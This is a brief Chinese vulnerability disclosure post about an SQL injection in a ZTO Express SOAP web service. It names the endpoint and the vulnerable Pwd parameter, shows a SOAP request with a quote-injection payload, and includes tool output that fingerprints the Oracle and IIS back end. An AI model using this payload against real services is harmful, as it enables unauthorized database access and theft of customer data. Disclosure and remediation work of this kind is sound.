中通速递WebService注入一枚

2014年01月18日02:21　阅读: 34183 次

标签: 数据库, 网站建设, 网络技术, 网络安全, windows, QQ技术, Linux, 源码, 网站安全, 系统安全, 企业安全, 信息技术, 安全软件, 软件开发, web开发, 移动开发, 电子书, 下载, 动画教程, 论坛, 反黑客, 网管技术, 等级考试

接口地址：

http://api.zto.cn/WebService.asmx?wsdl

Pwd参数存在SQL注入漏洞

<SOAP-ENV:Header/>

     <SOAP-ENV:Body>

        <urn:Search>

           <urn:Userid>1</urn:Userid>

           <urn:Pwd>-1'</urn:Pwd>

           <urn:SrtjobNo>1</urn:SrtjobNo>

        </urn:Search>

     </SOAP-ENV:Body>

</SOAP-ENV:Envelope>

版本信息：

[INFO] the back-end DBMS is Oracle

web server operating system: Windows 2008

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5

back-end DBMS: Oracle

oracle库名：

主库应该在这。。就不继续了。。

修复方案：

过滤~

分享到：更多